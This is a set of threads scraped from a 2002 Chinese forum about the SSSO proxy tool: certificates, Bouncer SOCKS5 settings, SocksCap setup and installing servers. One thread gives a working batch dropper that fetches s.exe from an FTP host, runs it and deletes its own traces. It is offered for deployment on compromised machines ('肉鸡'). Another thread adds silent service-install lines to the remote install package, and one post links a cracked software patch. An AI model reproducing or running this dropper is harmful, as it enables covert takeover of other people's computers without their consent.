我确实不明白，见谅见谅。能不能回答的详细一点，让我一次性看个明白，谢谢谢谢。

2002-11-22 16:13:36
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
第6楼
发贴心情
证书就是“密码本”，通过这个ssso服务器的所有数据都要按证书特有的密钥加密，如果大家都使用一个证书，就相当于使用一个密码本了，是不是容易被破译？（当然了，即使它们知道证书实际上也是难以破译的，无法在线破译，把所有内容都保存起来以后用超级计算机破译还不如叫它们去死，要花大代价大功夫，难的不如干脆派网特到所有上网电脑前蹲点），输入个人资料你随便输，填什么都可以，1234abcd，不会失效的，但不能中途停止，如果停止你就再制作。
2002-11-22 18:04:11
编辑这个贴子
沧海一粟 帅哥哟，离线，有人找我吗？

等级：论坛游民
文章：101
积分：288
注册：2002-10-23
第7楼
发贴心情
这么说客户端的证书是否自己制作并不重要，因为加密是用服务器的证书。
2002-11-23 9:21:31
编辑这个贴子
QFL861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：90
积分：257
注册：2002-10-23
第8楼

四、服务器端跳板阶联 ...

在SSSO远程安装工具包 V4.0 中还支持吗？

[此贴子已经被作者于2002-11-23 10:45:13编辑过]
2002-11-23 10:43:53
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
第9楼
发贴心情
这么说吧，目前的ssso功能已经够用了，不会再加强他了，甚至可能4.0就是终结版。
2002-11-23 14:11:49
编辑这个贴子
no.1 帅哥哟，离线，有人找我吗？

等级：管理员
文章：153
积分：577
注册：2002-10-26
第10楼

以下是引用沧海一粟在2002-11-23 9:21:31的发言：
这么说客户端的证书是否自己制作并不重要，因为加密是用服务器的证书。

白云学生说得很清楚了啊，就是最好自己制作自己的证书啊，这样最安全。

----------------------------------------------
有事请留言，我不用其他方式联系，谢谢！

2002-11-23 14:18:05
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
第11楼
发贴心情
是这样的，如果你要制作安装ssso服务器，就自己制作安全证书。如果只是用客户端浏览，不用制作。
2002-11-23 17:58:32
编辑这个贴子

本主题贴数11，分页： [1]


清心论坛--精华专题浏览：[原创]自制SSSO＋FLATSURFER安装包

→ 浏览：[原创]自制SSSO＋FLATSURFER安装包

您是本帖的第 299 个阅读者
* 贴子主题： [原创]自制SSSO＋FLATSURFER安装包
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：60
积分：194
注册：2002-11-6
楼顶
发贴心情 [原创]自制SSSO＋FLATSURFER安装包
现在，你可以自制SSSO4.2＋FLATSURFER服务器端安装包，达到一次制作可以使用两个软件的目的。如果有必要的话，你可以同时在本机运行两个软件的客户端程序，它们互不冲突。
具体是：
（1）安装完sssotool42.exe后，用创建安全证书选项（make_cert.bat）自制证书。
（2）将flatsurfer释放到一个文件夹，运行flatcert.exe生成一对证书，名字是flatcert.pk（公开钥匙）和flatcert.sk（私人钥匙）。将flatserver.exe、flatcert.pk、flatcert.sk三个文件添加到SSSO4.2的s.exe中。
（3）将s.exe中的run.bat释放出来，使用右键的编辑命令打开它，在其顶部加入以下两行：
flatserver /install /silent
net start flatservice
保存后，将run.bat添加到s.exe压缩包中。现在这个压缩包632K，还可以。
请同学们试验。
2002-12-5 12:52:51
编辑这个贴子 鲜花(0) 鸡蛋(0)
liz 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：51
积分：193
注册：2002-11-4
第2楼
发贴心情
你好！请教这样做的机器是否必须是2000？

你们辛苦了，致敬、致谢！

点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 13:03:50
编辑这个贴子
aaa 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：16
积分：127
注册：2002-11-13
第3楼
发贴心情
SSSO需要2000
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 13:09:17
编辑这个贴子
李文 帅哥哟，离线，有人找我吗？

等级：管理员
文章：51
积分：187
注册：2002-10-23
第4楼
发贴心情
真聪明，很好的办法:)
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 19:15:56
编辑这个贴子
春意 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：78
积分：181
注册：2002-10-24
第5楼
发贴心情
（1）安装完sssotool42.exe后，用创建安全证书选项（make_cert.bat）自制证书。
请问是不是选择创建安全证书就自动生成证书了？
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 19:33:37
编辑这个贴子
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：60
积分：194
注册：2002-11-6
第6楼
发贴心情
以下是引用春意在2002-12-5 19:33:37的发言：
（1）安装完sssotool42.exe后，用创建安全证书选项（make_cert.bat）自制证书。
请问是不是选择创建安全证书就自动生成证书了？

还要填一些内容，具体看安装包中白云的说明。
我现在想如果这两个软件都能各展所长就最好了，那就是双剑合璧，否则就没必要费这事了。至于必须是2000的问题，好象有的同学自己做的用ccproxy5.2的ssso是可以用NT的，这个我没有做过，不知是不是这样？
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 20:09:39
编辑这个贴子
春意 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：78
积分：181
注册：2002-10-24
第7楼
发贴心情
Country Name:（回答你的国家名称，必须是两个字母，如美国是US，中国是CN）
State or Province name:（回答所在的州或省的名称）
Locality Name:（回答所在城市的名称）
Organization Name:（回答所在机构、组织的名称）
Organizational Unit Name:（回答所在的部门名称）
Common Name:（回答服务器上网站的名称， [image] www.abc.com）
Email Address:（回答你的Email地址）

请问那些要填真实的？

点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 20:18:02
编辑这个贴子
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：60
积分：194
注册：2002-11-6
第8楼
发贴心情
以下是引用春意在2002-12-5 20:18:02的发言：
Country Name:（回答你的国家名称，必须是两个字母，如美国是US，中国是CN）
State or Province name:（回答所在的州或省的名称）
Locality Name:（回答所在城市的名称）
Organization Name:（回答所在机构、组织的名称）
Organizational Unit Name:（回答所在的部门名称）
Common Name:（回答服务器上网站的名称， [image] www.abc.com）
Email Address:（回答你的Email地址）

请问那些要填真实的？

哪一个都不需要填真实的。
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-5 20:32:45
编辑这个贴子
拂尘子 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：22
积分：62
注册：2002-10-25
第9楼

以下是引用古风在12/5/2002 12:52:51 PM的发言：
保存后，将run.bat添加到s.exe压缩包中。现在这个压缩包632K，还可以。
请同学们试验。

我做好以后怎么是681k,大了许多，不知正确否？我用添加并更新文件，对吗？谢谢！

点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-7 11:14:24
编辑这个贴子
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：262
积分：509
注册：2002-10-27
第10楼
发贴心情
对，我的就这样子
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-7 18:23:20
编辑这个贴子
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：60
积分：194
注册：2002-11-6
第11楼
发贴心情
以下是引用拂尘子在12/7/2002 11:14:24 AM的发言：

我做好以后怎么是681k,大了许多，不知正确否？我用添加并更新文件，对吗？谢谢！

我用ssso4.2做的也是681k。
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-7 19:21:00
编辑这个贴子
拂尘子 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：22
积分：62
注册：2002-10-25
第12楼
发贴心情
请问古风，在上传s.exe文件时，远程加密ssso端口号443要改成：6711吗？
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-8 0:55:16
编辑这个贴子
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：60
积分：194
注册：2002-11-6
第13楼
发贴心情 回复拂尘子
以下是引用拂尘子在2002-12-8 0:55:16的发言：
请问古风，在上传s.exe文件时，远程加密ssso端口号443要改成：6711吗？

不用，这个办法做出来的服务器可以两用，一是使用ssso上网，用443端口；二是使用flatsurfer上网，用6711端口。
点击查看用户来源及管理<br>发贴IP：a.b.c.d 2002-12-8 10:07:06
编辑这个贴子


清心论坛--精华专题浏览：精悍短小的SOCKS5服务器--Bouncer

→ 浏览：精悍短小的SOCKS5服务器--Bouncer

您是本帖的第 351 个阅读者 浏览上一篇主题 刷新本主题 树形显示贴子 　 浏览下一篇主题
* 贴子主题： 精悍短小的SOCKS5服务器--Bouncer
linux 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：69
积分：200
注册：2002-10-28
楼顶
发贴心情 精悍短小的SOCKS5服务器--Bouncer
SOCKS5服务器只是Bouncer的其中一个功能。Bouncer的大小WINDOWS版只有48K。
经过测试发现很好用，推荐给大家作为SOCKS5服务器。
Bouncer的SOCKS5服务器用法：
Bouncer --port 1080 --socks5

还有其他选项可以：
后台运行、只容许本机使用等，请看说明，自己操作。

Bouncer 是open source项目，但我没有看到源程序：（。

http://www.r00t3d.org.uk

2002-11-16 18:12:46
编辑这个贴子 鲜花(1) 鸡蛋(0)
QFL861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：90
积分：257
注册：2002-10-23
第2楼
发贴心情
应该很不错啊，其中SSL隧道与Proxy认证功能很有特色。如何设置使用，linux有没有心得呢？

另外，Bouncer的大小WINDOWS版好像是只有99,328字节，在ZIP包中是48K。这倒有个思路，使用EXE压缩工具处理一下，每个人都可以有自己的版本啦。

[此贴子已经被作者于2002-11-16 20:06:50编辑过]
2002-11-16 19:49:07
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
第3楼
发贴心情
》》不错，可以限制只本机连接。但没有办法把它做成服务，原来的方法对它的参数不认了，还得慢慢找。

哦，太马虎了，没有仔细验证，可以的，完全可以，就用他啦！

[此贴子已经被作者于2002-11-16 23:35:31编辑过]
2002-11-16 22:35:10
编辑这个贴子
no.1 帅哥哟，离线，有人找我吗？

等级：管理员
文章：153
积分：577
注册：2002-10-26
第4楼
发贴心情
请教：在dos下输入命令Bouncer --port 1080 --socks5后，ZA有反映，我让它通过防火墙，但接下去具体怎么用它呢？

----------------------------------------------
有事请留言，我不用其他方式联系，谢谢！

2002-11-17 0:45:33
编辑这个贴子
sunday 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：5
积分：64
注册：2002-10-28
第5楼
发贴心情
能否详细说明Bouncer怎样使用，我现在一头雾水。
2002-11-17 0:46:01
编辑这个贴子
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：130
积分：296
注册：2002-10-23
第6楼
发贴心情
做了几个，大家测试一下，看看怎么样。
61.56.130.18:4043
61.56.132.114:4043
61.56.129.54:4043
61.56.131.26:4043
61.56.132.72:4043

用猎手验证socks5时，显示“要密码”，但实际是free的。

[此贴子已经被作者于2002-11-17 1:49:54编辑过]
2002-11-17 1:45:28
编辑这个贴子
guest 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：11
积分：60
注册：2002-11-17
第7楼
发贴心情
》请教：在dos下输入命令Bouncer --port 1080 --socks5后，ZA有反映，我让它通过防火墙，但接下去具体怎么用它呢？

他是SOCKS5服务器，要和SOCKSCAP（或e-Border--好象和Bouncer 配合不行）一起用。
一般是提供给其他人用的，不是本机。

2002-11-17 11:35:14
编辑这个贴子
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：130
积分：296
注册：2002-10-23
第8楼
发贴心情
好像不支持ssl连接，它带的SSL隧道只是http代理。
2002-11-17 20:07:54
编辑这个贴子
guest 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：11
积分：60
注册：2002-11-17
第9楼
发贴心情
SOCKS代理不存在象HTTP代理的“支不支持ssl连接”。他不管数据是什么，都传递。
》它带的SSL隧道只是http代理。
“SOCKS5代理服务器”只是Bouncer 其中一个功能，象“它带的SSL隧道”是其他功能。
2002-11-17 20:39:36
编辑这个贴子
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：130
积分：296
注册：2002-10-23
第10楼
发贴心情
但我做的这几个不能连接https网站。
2002-11-17 23:20:49
编辑这个贴子
guest 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：11
积分：60
注册：2002-11-17
第11楼
发贴心情
和Bouncer无关吧，我曾通过他上这里https://
是不是其他原因？
2002-11-17 23:30:35
编辑这个贴子
QFL861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：90
积分：257
注册：2002-10-23
第12楼
发贴心情
在SOCKSCAP中设置socks服务器：61.56.132.72:4043，再选择sock5，从SOCKSCAP中调用IE5.5，连 [image] www.yahoo.com，不通 : ( ，请帮忙说一下，哪儿出的问题呢？

[此贴子已经被作者于2002-11-18 0:19:47编辑过]
2002-11-18 0:19:07
编辑这个贴子
沧海一粟 帅哥哟，离线，有人找我吗？

等级：论坛游民
文章：101
积分：288
注册：2002-10-23
第13楼
发贴心情
转贴: bouncer新版本sock5代理服务器.请你测试
http://www.r00t3d.org.uk/bin/
bouncer-1.0.rc6-win32.zip
新版本sock5代理服务器.请你测试
http://www.r00t3d.org.uk/docs/draft-luotonen-web-proxy-tunneling-01.txt说明
______________________________________
C:\WINNT\system32\aa>bouncer /?
bouncer /?
Bouncer v1.0.RC6 (MileStone)
Build Date: Apr 25 2002 21:18:15
Copyright (c) 2002 Chris Mason
All Rights Reserved

Mandatory Options: (命令选择)
--port Port (Listen Port)
--destination Host:Port (Destination Host) (目的地主机)
--socks5 (Socks 5 Server Mode)

Optional Options:(任意选择)
--bind IP (IP To Bind Listening Socket To)
--c_bind IP (IP To Bind Outgoing Connections To)
--timeout Seconds (Connect, Socks 5 And Tunnelling Time Out)
--tcpnodelay (Disable Nagle''''s Algorithm)
--daemon (Run In The Background As A Daemon)(后台程序)

Logging Options:
--logfile File (File To Output Messages To)
--full-time (Include Date In Timestamps)

SSL Tunnelling Options:
--tunnel Host:Port (HTTP Proxy To SSL Tunnel Through)
--t_user User (User For HTTP Proxy)
--t_password Password (Password For HTTP Proxy)

Access Restriction Options:(存取限制选择) (ip策略 和 用户密码验证)
--allow IP Mask (IP Mask Of Allowed Connections)
--deny IP Mask (IP Mask Of Denied Connections)
--s_user User (User For Socks 5 Server)
--s_password Password (Password For Socks 5 Server)

Administration Options:(管理员选择)
--a_port Port (HTTP Listen Port)
--a_bind IP (IP To Bind Listening Socket To)
--a_user User (User For HTTP Administration Server)
--a_password Password (Password For HTTP Administration Server)

不知道能够串接吗???
测试结论:
1. 不支持中国的oicq程序的udp数据包代理
2. 多个同类型的sock5代理串接的不是很方便.也没有条件测试.
3. 命令行方式参数太长. 好像不是服务方式安装.

有点.1 支持web方式浏览经过改代理服务的所有ip地址.(进入出去)
2 支持密码验证.
3 支持客户端ip限制
4 (HTTP Proxy To SSL Tunnel Through)

参考命令行
1.
C:\WINNT\system32\aa>boun --port 2222 --socks5

2.
C:\WINNT\system32\aa>boun --port 2222 --socks5 --timeout 20 --s_user z --s_password bbbb

3.
C:\WINNT\system32\aa>boun --port 2222 --socks5 --timeout 20 --a_port 3333 --a_user x --a_password cccc
部分记录:
[13:50.36] Waiting For TCP Connections On 0.0.0.0:2222
[13:51.43] [1] Accepted Connection From 218.x.x.243:3235
[13:51.44] [1] Attempting To Connect To 218.x.x.169:5278
[13:51.44] [1] Successfully Connected To 218.x.x.169:5278
[13:52.33] [2] Accepted Connection From 218.x.x.243:3425
[13:52.38] [2] Socks 5 Timed Out Negotiating Methods
[13:52.44] [2] Connection Closed
[13:52.49] [2] Accepted Connection From 218.58.35.243:3436
[13:52.49] [2] Unsupported UDP ASSOCIATE Method Received From Socks 5 Client
[13:52.49] [2] Connection Closed

[此贴子已经被阳光于2002-11-18 18:54:48编辑过]
2002-11-18 11:36:29
编辑这个贴子
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：130
积分：296
注册：2002-10-23
第14楼

以下是引用QFL861在2002-11-18 0:19:07的发言：
在SOCKSCAP中设置socks服务器：61.56.132.72:4043，再选择sock5，从SOCKSCAP中调用IE5.5，连 [image] www.yahoo.com，不通:(，请帮忙说一下，哪儿出的问题呢？

61.56.132.72:4043是在stunnel.conf中设置的，sockscap中设置的是127.0.0.1:1913。

[此贴子已经被作者于2002-11-18 14:29:47编辑过]
2002-11-18 14:28:31
编辑这个贴子
flyma 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：11
积分：30
注册：2002-10-24
第15楼
发贴心情
如何限制一个IP段访问呢，如192.168.1.0－192.168.1.255　我老是实验不成，只能限制一个IP。
2002-11-18 16:06:30
编辑这个贴子
flyma 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：11
积分：30
注册：2002-10-24
第16楼
发贴心情
还有如果把多个同类型的sock5代理串接的？
2002-11-18 18:59:04
编辑这个贴子


清心论坛--精华专题浏览：局域网中系统是win2000的用户如何用ssso？

→ 浏览：局域网中系统是win2000的用户如何用ssso？

您是本帖的第 134 个阅读者
* 贴子主题： 局域网中系统是win2000的用户如何用ssso？
明月无心 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：14
积分：90
注册：2002-11-20
楼顶
发贴心情 局域网中系统是win2000的用户如何用ssso？
我看了打包的“冲破网络封锁的极品软件”，我还是没有最后解决这个问题。

我从网上找到e－Border，发现它不适用于2000，敬请热心的高手指点。对此本人不胜感激！！！

2002-11-22 14:44:02
编辑这个贴子 鲜花(0) 鸡蛋(0)
no.1 帅哥哟，离线，有人找我吗？

等级：管理员
文章：153
积分：577
注册：2002-10-26
第2楼
发贴心情
其实各位都已经讲得很清楚了，如果局域网中能够单独上外网的话就能够用代理看世界0.6版本突破网络封锁了，如果一定要通过内部代理上外网的话，你还是不要再考虑这个问题了，那个解决方案实在太麻烦，没有必要去学这个东西了，时间实在有限啊，还是放弃另想办法吧

----------------------------------------------
有事请留言，我不用其他方式联系，谢谢！

2002-11-22 16:22:20
编辑这个贴子
linux 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：69
积分：200
注册：2002-10-28
第3楼
发贴心情
》我从网上找到e－Border，发现它不适用于2000
不会吧，我知道他2.0不支持WIN98-1，2000从来就应该支持的呀。
2002-11-22 20:08:49
编辑这个贴子
QFL861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：90
积分：257
注册：2002-10-23
第4楼
发贴心情
win2k中文+SP3 下用 eBorder-client-win_2_11.exe + 汉化破解补丁

e-Border英文原版 [image] http://proxy365.1399.org/soft/eBorder-client-win_2_11.exe
汉化破解补丁 [image] http://proxy365.1399.org/soft/HBC-eClient211-Ronnier.zip

安装时，系统时间要设到2000年左右。

[此贴子已经被作者于2002-11-23 10:51:15编辑过]
2002-11-23 10:40:22
编辑这个贴子
cltflq 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：15
积分：42
注册：2002-11-2
第5楼
发贴心情
e-Border是什么软件啊，比SSSO还好吗，谁可以介绍一下啊~！谢谢
2002-11-24 17:29:06
编辑这个贴子
明月无心 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：14
积分：90
注册：2002-11-20
第6楼
发贴心情
真是谢谢各位了！
2002-11-25 10:32:16
编辑这个贴子

本主题贴数6，分页： [1]


清心论坛--精华专题浏览：请教两个问题，关于ssso

您是本帖的第 89 个阅读者
* 贴子主题： 请教两个问题，关于ssso
新家园 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：4
积分：61
注册：2002-12-3
楼顶
发贴心情 请教两个问题，关于ssso
1.为什么sss0做了证书以后，会更安全。在运行过程中并未觉察到做与不做的区别。
2.ssso的ssl通讯数据流是否有较明显的特征。
3.服务器端的1122端口是否还存在（4.0版）。
安全第一，安全第一啊！谢谢ssso程序的开发者与维护者。
2002-12-3 20:19:19
编辑这个贴子 鲜花(0) 鸡蛋(0)
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：119
积分：584
注册：2002-10-24
第2楼

做了证书再上传安装ssso就和默认的证书不一样了。
ssso没有明显的特征。
socks端口不开放了，但存在。
2002-12-3 20:25:53
QFL861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：96
积分：287
注册：2002-10-23
第3楼
发贴心情
以下引用白云的发言：...socks端口不开放了，但存在...

请教：
若存在，还能被使用吗？
4.2版本中有变化吗？

[此贴子已经被作者于2002-12-3 21:37:01编辑过]
2002-12-3 21:35:53
编辑这个贴子
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：119
积分：584
注册：2002-10-24
第4楼
发贴心情
存在，但我没有开放它，是为了防止被人用工具轻易搜索到，为了保护ssso。4.2自然也不会开放。
2002-12-3 22:35:06
编辑这个贴子


清心论坛--精华专题浏览：跳板4.2和ssso同时安装的问题(续)

→ 浏览：跳板4.2和ssso同时安装的问题(续)

您是本帖的第 267 个阅读者
* 贴子主题： 跳板4.2和ssso同时安装的问题(续)
qfl861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：90
积分：257
注册：2002-10-23
楼顶
发贴心情 跳板4.2和ssso同时安装的问题(续)

兰天说：“我是关闭了跳板后，ssso同样显示本机ip，卸载4。2安装3。0后，这种现象消失。
跳板4。2在不安装ssso的机器上也能显示本机ip .这样看来，是gui 1.09的问题，4。0以下的gui 1.03没问题.”

兰天又说：“用代理myie本机的显示不变，外部测试发现变化。”

我不太明白，请问兰天最后有结论了吗？

[此贴子已经被作者于2002-11-19 16:19:32编辑过]
2002-10-28 21:20:30
编辑这个贴子 鲜花(0) 鸡蛋(0)
乐助 帅哥哟，离线，有人找我吗？

等级：管理员
文章：140
积分：287
注册：2002-10-23
第2楼
发贴心情
我没发现有那样的问题

----------------------------------------------
最近比较忙，可能有留言的没时间回复了，请多多原谅！谢谢！
有事请留言，我不用其他方式联系，谢谢！

2002-10-28 21:41:07
编辑这个贴子
qfl861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：90
积分：257
注册：2002-10-23
第3楼
发贴心情 --------------------------
谢谢乐助。

白云说：“是同时使用就不行，同时使用会失去ssso的效果。”

若都安装了，但不同时使用如何？

[此贴子已经被作者于2002-11-19 16:10:21编辑过]
2002-10-28 21:47:36
编辑这个贴子
乐助 帅哥哟，离线，有人找我吗？

等级：管理员
文章：140
积分：287
注册：2002-10-23
第4楼
发贴心情
我就是那样安装的，没事。也许是操作系统的问题吧。我是2000

----------------------------------------------
最近比较忙，可能有留言的没时间回复了，请多多原谅！谢谢！
有事请留言，我不用其他方式联系，谢谢！

2002-10-28 21:49:37
编辑这个贴子
qfl861 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：90
积分：257
注册：2002-10-23
第5楼
发贴心情
谢谢乐。
2002-10-28 22:07:30
编辑这个贴子
兰天 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：25
积分：156
注册：2002-10-28
第6楼
发贴心情
发现傻瓜跳板4.2出现显示本机ip，不只是我一个人。
我也是 2000，但是，就是出现了机内有跳板4.2版本，即使不打开跳板，ssso也在myie的右下角显示出我的ip。当我卸载后装上另外的版本，无论运行什么都会显示：0.0.0.1。

“用代理myie本机的显示不变，外部测试发现变化“ 是说在myie里用代理，和不用代理一样，都显示本机ip，用代理时网上的测试页检查ip为所用的代理ip.但右下角还是显示真正的ip.

----------------------------------------------
一切为他人

2002-10-28 22:29:41
编辑这个贴子
乐助 帅哥哟，离线，有人找我吗？

等级：管理员
文章：140
积分：287
注册：2002-10-23
第7楼
发贴心情
我没有这个问题，另外，4。2的不是gui 1.09是gui 1.03呀？好像没有gui 1.09？你再仔细看看

只要两个不同时运行就可以，因为他们占用相同的端口1913

[此贴子已经被作者于2002-10-28 10:16:09编辑过]

----------------------------------------------
最近比较忙，可能有留言的没时间回复了，请多多原谅！谢谢！
有事请留言，我不用其他方式联系，谢谢！

2002-10-28 23:02:28
编辑这个贴子
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：130
积分：296
注册：2002-10-23
第8楼
发贴心情
在sockscap中启动MYIE，就会显示0.0.0.1等，如果不在sockscap中启动，那就会显示本机IP。
2002-10-28 23:14:45
编辑这个贴子
乐助 帅哥哟，离线，有人找我吗？

等级：管理员
文章：140
积分：287
注册：2002-10-23
第9楼

以下是引用asd在2002-10-28 23:14:45的发言：
在sockscap中启动MYIE，就会显示0.0.0.1等，如果不在sockscap中启动，那就会显示本机IP。

不错，只要是在sockscap中启动MYIE启动，就会显示0.0.0.1，而不论SSSO或者跳板是否启动

----------------------------------------------
最近比较忙，可能有留言的没时间回复了，请多多原谅！谢谢！
有事请留言，我不用其他方式联系，谢谢！

2002-10-28 23:19:06
编辑这个贴子
阳光 帅哥哟，离线，有人找我吗？

等级：管理员
文章：60
积分：124
注册：2002-10-25
第10楼
发贴心情
以下是引用兰天在2002-10-28 22:29:41的发言：
发现傻瓜跳板4.2出现显示本机ip，不只是我一个人。
我也是 2000，但是，就是出现了机内有跳板4.2版本，即使不打开跳板，ssso也在myie的右下角显示出我的ip。当我卸载后装上另外的版本，无论运行什么都会显示：0.0.0.1。

“用代理myie本机的显示不变，外部测试发现变化“ 是说在myie里用代理，和不用代理一样，都显示本机ip，用代理时网上的测试页检查ip为所用的代理ip.但右下角还是显示真正的ip.

MYIE的外部工具管理器，你是否加进其它工具了，以前我将MSN加到外部工具管理器中，觉得这样用起来方便，但在GU中确看到了，除了本机跳板、外部跳板还有我的真实IP在里面。
2002-10-28 23:36:20
编辑这个贴子
兰天 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：25
积分：156
注册：2002-10-28
第11楼
发贴心情
那谁能解释我用4。2显示本机的ip .

----------------------------------------------
一切为他人

2002-10-30 10:30:17
编辑这个贴子
沧海一粟 帅哥哟，离线，有人找我吗？

等级：论坛游民
文章：101
积分：288
注册：2002-10-23
第12楼
发贴心情
不放心的话，自己动手：
删除傻瓜跳板，装一个低版本的sockscap和skgui搭配，将ssso的本机端口由1913改为别的，诸如1613等，与ssso搭配的sockscap2.3设置中也要修改。这样就可以同时使用跳板和ssso了。
我用sockscap2。0beta和skgui搭配，sockscap2。3和ssso搭配，同时使用没有冲突。
2002-10-30 11:17:47
编辑这个贴子
johnchang 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：10
积分：57
注册：2002-10-27
第13楼
发贴心情
winme装了傻瓜跳板或SSSO后被禁止的网站还是不能去的，一般还要结合其他软件。
2002-11-19 20:23:25
编辑这个贴子

本主题贴数13，分页： [1]


清心论坛--精华专题浏览：一个快速作ssso服务器的方法

→ → 浏览：一个快速作ssso服务器的方法

您是本帖的第 204 个阅读者 浏览上一篇主题 刷新本主题 树形显示贴子 　 浏览下一篇主题
* 贴子主题： 一个快速作ssso服务器的方法
asd 帅哥哟，离线，有人找我吗？

等级：版主
文章：130
积分：296
注册：2002-10-23
楼顶
发贴心情 一个快速作ssso服务器的方法
许多朋友是拨号上网，复制几百K的文件过去有点慢，如果只复制几百个字节就好办多了，下面就说说如何实现。

首先要有一个自己的ftp空间，网上有很多，可以申请一个，空间大小无所谓，有1M就行。比如现在已经有一个了：ftp.host.com，用户名是user，密码是pass，然后把s.exe上传过去，好了，打开记事本，写下下面这些命令：
echo open ftp.host.com>ssso.txt
echo user>>ssso.txt
echo pass>>ssso.txt
echo bin>>ssso.txt
echo get s.exe>>ssso.txt
echo bye>>ssso.txt
ftp -s:ssso.txt
s.exe
attrib -r ssso.txt
del ssso.txt
attrib -r ssso.bat
del ssso.bat

然后把这个另存为ssso.bat，以后扫到肉鸡后，把这个ssso.bat弄过去并运行就行了。

需要注意两点：
1，有的ftp空间带杀毒功能，如果你上传其它一些hack工具的话，不能保证全能留下。
2，有的肉鸡运行ftp有问题，所以不保证全能成功，不过几率比较小。

2002-11-23 17:22:02
编辑这个贴子 鲜花(0) 鸡蛋(0)
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：262
积分：509
注册：2002-10-27
第2楼
发贴心情
测试成功，谢谢
2002-11-23 23:40:31
编辑这个贴子
小张 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：10
积分：123
注册：2002-11-10
第3楼
发贴心情
请问要如何远程打开ssso.bat?还是有ssso安装助手吗？或是用什么命令？

----------------------------------------------
希望在这里得到大家的帮助，谢谢。

2002-11-24 13:53:00
编辑这个贴子
jzx 帅哥哟，离线，有人找我吗？

等级：管理员
文章：262
积分：509
注册：2002-10-27
第4楼
发贴心情
一样的，把ssso.bat放到sssotool目录下，将助手的s.exe改为ssso.bat就行了
2002-11-24 14:13:32
编辑这个贴子

本主题贴数4，分页： [1]
*快速回复：一个快速作ssso服务器的方法
你的用户名: 还没注册? 密码: 忘记密码?
内容
  • HTML标签： 不可用
  • UBB标签： 可用
  • 贴图标签： 可用
  • Flash标签：可用
  • 表情字符转换：可用
  • 上传图片：可用
  • 最多31KB
    • 邮件回复 显示签名 [Ctrl+Enter直接提交贴子]

    锁定 | 解锁 | 删除 | 移动 | 固顶 | 奖励 | 惩罚 | 发布公告

    Powered by：DVBBS Ver5.0 Final
    Copyright ?2000 - 2002 AspSky.Net , 页面执行时间：203.125毫秒


清心论坛--精华专题浏览：征求意见－关于ssso服务器端的修改

→ 浏览：征求意见－关于ssso服务器端的修改

您是本帖的第 598 个阅读者
* 贴子主题： 征求意见－关于ssso服务器端的修改
白云 帅哥哟，离线，有人找我吗？

等级：管理员
文章：112
积分：549
注册：2002-10-24
楼顶
发贴心情 征求意见－关于ssso服务器端的修改
不死鸟新编译了标准的socks5代理服务器，可以用来替代目前ssso服务器端的bouncer.exe，但标准的socks服务器体积大了些，加入服务器端后会比目前增加近400K的体积，大家看是否加入？标准的socks5代理支持目前bouncer.exe不支持的QQ等，功能应该是较全面的。我个人倾向于往小巧方面发展，大家可谈谈自己的看法。
2002-11-22 20:00:48
编辑这个贴子 鲜花(0) 鸡蛋(0)
古风 帅哥哟，离线，有人找我吗？

等级：新手上路
文章：60
积分：194
注册：2002-11-6
第2楼
发贴心情
